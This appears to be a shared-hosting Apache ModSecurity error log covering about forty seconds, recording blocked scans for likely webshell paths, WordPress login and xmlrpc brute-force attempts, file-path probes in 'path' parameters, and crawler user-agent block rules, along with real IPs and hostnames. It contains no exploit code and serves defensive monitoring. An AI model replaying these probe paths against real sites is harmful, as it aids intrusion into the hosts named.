[Tue May 26 18:08:10.745795 2026] [security2:error] [pid 960743:tid 960974] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUMvQvEln_BHBy2zKL0wAAAOo"]
[Tue May 26 18:08:11.132798 2026] [security2:error] [pid 960743:tid 960948] [client 185.192.70.100:64979] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 100.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-includes/click.php"] [unique_id "ahWUM_QvEln_BHBy2zKL4AAAANA"]
[Tue May 26 18:08:11.515611 2026] [security2:error] [pid 960743:tid 960775] [remote 211.23.68.235:54279] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.68.23.211.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWUM_QvEln_BHBy2zKL4QAAth8"]
[Tue May 26 18:08:12.192105 2026] [security2:error] [pid 960743:tid 960958] [client 185.192.70.99:39739] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 99.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/.well-known/wp-conflg.php"] [unique_id "ahWUNPQvEln_BHBy2zKL_gAAANo"]
[Tue May 26 18:08:12.741720 2026] [security2:error] [pid 960743:tid 960947] [client 185.198.240.93:35637] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "mexicoimportaciones.com"] [uri "/style.php"] [unique_id "ahWUNPQvEln_BHBy2zKMCwAAAM8"]
[Tue May 26 18:08:12.956894 2026] [security2:error] [pid 960743:tid 960973] [client 185.198.240.131:59817] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "mexicoimportaciones.com"] [uri "/wp-content/style.php"] [unique_id "ahWUNPQvEln_BHBy2zKMEwAAAOk"]
[Tue May 26 18:08:13.099500 2026] [security2:error] [pid 960743:tid 960873] [client 185.198.240.86:50093] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "mexicoimportaciones.com"] [uri "/wp-admin/style.php"] [unique_id "ahWUNfQvEln_BHBy2zKMFwAAAIU"]
[Tue May 26 18:08:13.110006 2026] [security2:error] [pid 960743:tid 960898] [client 185.192.70.79:27047] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 79.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-admin/css/colors/blue/atomlib.php"] [unique_id "ahWUNfQvEln_BHBy2zKMGAAAAJ4"]
[Tue May 26 18:08:13.247329 2026] [security2:error] [pid 960743:tid 960918] [client 185.198.240.91:31095] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "mexicoimportaciones.com"] [uri "/wp-includes/style.php"] [unique_id "ahWUNfQvEln_BHBy2zKMHwAAALI"]
[Tue May 26 18:08:13.556865 2026] [security2:error] [pid 960743:tid 960776] [remote 78.142.18.172:58156] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.18.142.78.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWUNfQvEln_BHBy2zKMJAAA3SA"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:08:14.013581 2026] [security2:error] [pid 960743:tid 960915] [client 185.192.70.71:26161] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 71.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-admin/js/widgets/bypass.php"] [unique_id "ahWUNvQvEln_BHBy2zKMNwAAAK8"]
[Tue May 26 18:08:14.199294 2026] [security2:error] [pid 960743:tid 960981] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUNfQvEln_BHBy2zKMLAAAAPE"]
[Tue May 26 18:08:14.946242 2026] [security2:error] [pid 960743:tid 960930] [client 185.192.70.4:42475] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 4.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-includes/random_compat/chosen.php"] [unique_id "ahWUNvQvEln_BHBy2zKMSAAAAL4"]
[Tue May 26 18:08:15.465955 2026] [security2:error] [pid 960743:tid 960925] [client 82.76.238.33:56554] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWUN_QvEln_BHBy2zKMXAAAALk"]
[Tue May 26 18:08:15.466113 2026] [security2:error] [pid 960743:tid 960925] [client 82.76.238.33:56554] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWUN_QvEln_BHBy2zKMXAAAALk"]
[Tue May 26 18:08:16.848064 2026] [security2:error] [pid 960743:tid 960997] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUOPQvEln_BHBy2zKMewAAAQE"]
[Tue May 26 18:08:17.400424 2026] [security2:error] [pid 960743:tid 960945] [client 185.192.70.84:57787] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 84.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-admin/index.php"] [unique_id "ahWUOfQvEln_BHBy2zKMkgAAAM0"]
[Tue May 26 18:08:17.630459 2026] [security2:error] [pid 960743:tid 960978] [client 114.119.145.65:56345] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "rainadelproperties.com"] [uri "/properties/apartment-on-park-avenue/"] [unique_id "ahWUOfQvEln_BHBy2zKMoQAAAO4"], referer: https://rainadelproperties.com/properties-list/
[Tue May 26 18:08:18.324529 2026] [security2:error] [pid 960743:tid 960876] [client 185.192.70.94:41909] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 94.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/edit.php"] [unique_id "ahWUOvQvEln_BHBy2zKMugAAAIg"]
[Tue May 26 18:08:18.353109 2026] [lsapi:error] [pid 960743:tid 960886] [client 74.7.243.210:0] [host billing.mosykay.com] Error receiving response header (lsphp is killed?): ReceiveResponseHeader: receive pkg hdr failed: ReceivePkgHdr: nothing to read from backend (LVE ID 1035; user ID 1035), check http://docs.cloudlinux.com/mod_lsapi_troubleshooting.html, referer: https://billing.mosykay.com/?path=//sys/bus/node/devices/node0/cpu9/node0/memory71/subsystem/devices/memory218/node0/memory114/node0
[Tue May 26 18:08:19.102926 2026] [security2:error] [pid 960743:tid 960903] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUOvQvEln_BHBy2zKM0AAAAKM"]
[Tue May 26 18:08:19.333924 2026] [security2:error] [pid 960743:tid 960931] [client 185.192.70.75:32265] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 75.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-content/plugins/WordPressCore/index.php"] [unique_id "ahWUO_QvEln_BHBy2zKM3AAAAL8"]
[Tue May 26 18:08:20.550601 2026] [security2:error] [pid 960743:tid 960895] [client 185.192.70.80:31273] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 80.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/cgi-bin/autoload_classmap.php"] [unique_id "ahWUPPQvEln_BHBy2zKNBgAAAJs"]
[Tue May 26 18:08:21.128245 2026] [security2:error] [pid 960743:tid 960950] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUPPQvEln_BHBy2zKNCQAAANI"]
[Tue May 26 18:08:21.466455 2026] [security2:error] [pid 960743:tid 960967] [client 185.192.70.95:65137] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-links-opml.php"] [unique_id "ahWUPfQvEln_BHBy2zKNGgAAAOM"]
[Tue May 26 18:08:22.417179 2026] [security2:error] [pid 960743:tid 960830] [remote 74.7.241.58:40122] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWUPvQvEln_BHBy2zKNMgAA4lY"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/mosykay.com/account/lang/de
[Tue May 26 18:08:22.923454 2026] [security2:error] [pid 960743:tid 960898] [client 14.173.62.140:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWUPvQvEln_BHBy2zKNMwAAAJ4"]
[Tue May 26 18:08:23.173345 2026] [security2:error] [pid 960743:tid 960836] [remote 38.95.35.74:54368] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.35.95.38.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWUPvQvEln_BHBy2zKNRQAAmFw"]
[Tue May 26 18:08:23.398424 2026] [security2:error] [pid 960743:tid 960839] [remote 38.95.35.74:54368] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.35.95.38.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWUP_QvEln_BHBy2zKNVAAA5V8"], referer: https://filosha.com/wp-login.php
[Tue May 26 18:08:23.859437 2026] [security2:error] [pid 960743:tid 960984] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUP_QvEln_BHBy2zKNWgAAAPQ"]
[Tue May 26 18:08:26.399514 2026] [security2:error] [pid 960743:tid 960874] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUQfQvEln_BHBy2zKNngAAAIY"]
[Tue May 26 18:08:26.717667 2026] [security2:error] [pid 960743:tid 960993] [client 146.174.190.249:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUQvQvEln_BHBy2zKNpwAAAP0"]
[Tue May 26 18:08:27.028402 2026] [security2:error] [pid 960743:tid 960915] [client 82.76.238.33:57029] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWUQvQvEln_BHBy2zKNvQAAAK8"]
[Tue May 26 18:08:27.028595 2026] [security2:error] [pid 960743:tid 960915] [client 82.76.238.33:57029] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWUQvQvEln_BHBy2zKNvQAAAK8"]
[Tue May 26 18:08:27.952798 2026] [security2:error] [pid 960743:tid 960951] [client 114.119.131.253:23551] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "osmsi.org.in"] [uri "/images/osmsi_jonathan.jpg"] [unique_id "ahWUQ_QvEln_BHBy2zKN2AAAANM"], referer: http://osmsi.org.in/images/osmsi_jonathan.jpg
[Tue May 26 18:08:29.641494 2026] [security2:error] [pid 960743:tid 960919] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWURfQvEln_BHBy2zKOBgAAALM"]
[Tue May 26 18:08:32.000722 2026] [security2:error] [pid 960743:tid 960883] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUR_QvEln_BHBy2zKOPgAAAI8"]
[Tue May 26 18:08:32.738128 2026] [security2:error] [pid 960743:tid 960942] [client 160.22.223.15:34996] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "mosykay.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUSPQvEln_BHBy2zKOVAAAAMo"]
[Tue May 26 18:08:33.147852 2026] [security2:error] [pid 960743:tid 960942] [client 160.22.223.15:34996] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "302"] [hostname "mosykay.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUSPQvEln_BHBy2zKOVAAAAMo"]
[Tue May 26 18:08:33.147911 2026] [security2:error] [pid 960743:tid 960942] [client 160.22.223.15:34996] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "mosykay.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUSPQvEln_BHBy2zKOVAAAAMo"]
[Tue May 26 18:08:34.229663 2026] [security2:error] [pid 960743:tid 960949] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUSfQvEln_BHBy2zKOiQAAANE"]
[Tue May 26 18:08:36.352825 2026] [security2:error] [pid 960743:tid 960949] [client 82.76.238.33:57415] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWUTPQvEln_BHBy2zKO2QAAANE"]
[Tue May 26 18:08:36.352953 2026] [security2:error] [pid 960743:tid 960949] [client 82.76.238.33:57415] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWUTPQvEln_BHBy2zKO2QAAANE"]
[Tue May 26 18:08:37.487001 2026] [security2:error] [pid 960743:tid 960945] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUTPQvEln_BHBy2zKO6wAAAM0"]
[Tue May 26 18:08:39.564649 2026] [security2:error] [pid 960743:tid 960874] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUT_QvEln_BHBy2zKPMQAAAIY"]
[Tue May 26 18:08:41.181309 2026] [security2:error] [pid 960743:tid 960851] [remote 51.91.98.45:45920] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWUUfQvEln_BHBy2zKPZQAAxms"]
[Tue May 26 18:08:41.263064 2026] [security2:error] [pid 960743:tid 960921] [client 160.22.223.15:35127] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "mosykay.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUUfQvEln_BHBy2zKPcgAAALU"]
[Tue May 26 18:08:41.414261 2026] [security2:error] [pid 960743:tid 960821] [remote 51.91.98.45:45920] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWUUfQvEln_BHBy2zKPcwAAnk0"], referer: https://obinnawrites.com/wp-login.php
[Tue May 26 18:08:41.605579 2026] [security2:error] [pid 960743:tid 960921] [client 160.22.223.15:35127] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "mosykay.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUUfQvEln_BHBy2zKPcgAAALU"]
[Tue May 26 18:08:42.028088 2026] [security2:error] [pid 960743:tid 960819] [remote 14.161.17.36:54060] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 36.17.161.14.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclubmembership.com"] [uri "/wp-login.php"] [unique_id "ahWUUfQvEln_BHBy2zKPggAAz0s"]
[Tue May 26 18:08:42.553495 2026] [security2:error] [pid 960743:tid 960979] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUUvQvEln_BHBy2zKPjgAAAO8"]
[Tue May 26 18:08:44.719206 2026] [security2:error] [pid 960743:tid 960924] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUVPQvEln_BHBy2zKPzgAAALg"]
[Tue May 26 18:08:45.713535 2026] [security2:error] [pid 960743:tid 960949] [client 160.22.223.15:35185] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "mosykay.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUVfQvEln_BHBy2zKP_AAAANE"]
[Tue May 26 18:08:45.960084 2026] [security2:error] [pid 960743:tid 960949] [client 160.22.223.15:35185] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "mosykay.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUVfQvEln_BHBy2zKP_AAAANE"]
[Tue May 26 18:08:46.791662 2026] [security2:error] [pid 960743:tid 960941] [client 82.76.238.33:57838] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWUVvQvEln_BHBy2zKQGgAAAMk"]
[Tue May 26 18:08:46.791808 2026] [security2:error] [pid 960743:tid 960941] [client 82.76.238.33:57838] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWUVvQvEln_BHBy2zKQGgAAAMk"]
[Tue May 26 18:08:47.190766 2026] [security2:error] [pid 960743:tid 960958] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUVvQvEln_BHBy2zKQGQAAANo"]
[Tue May 26 18:08:49.009405 2026] [security2:error] [pid 960743:tid 960953] [client 85.208.96.203:62454] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/9/"] [unique_id "ahWUWfQvEln_BHBy2zKQawAAANU"]
[Tue May 26 18:08:49.009541 2026] [security2:error] [pid 960743:tid 960953] [client 85.208.96.203:62454] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/9/"] [unique_id "ahWUWfQvEln_BHBy2zKQawAAANU"]
[Tue May 26 18:08:49.147520 2026] [security2:error] [pid 960743:tid 960992] [client 185.192.70.70:61389] ModSecurity: Access denied with code 406 (phase 1). Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "655"] [id "900155"] [msg "WP Brute UA block"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-admin/css/colors/light/"] [unique_id "ahWUWfQvEln_BHBy2zKQcwAAAPw"]
[Tue May 26 18:08:50.304367 2026] [security2:error] [pid 960743:tid 960955] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUWfQvEln_BHBy2zKQhAAAANc"]
[Tue May 26 18:08:52.445699 2026] [security2:error] [pid 960743:tid 960935] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUXPQvEln_BHBy2zKQzwAAAMM"]
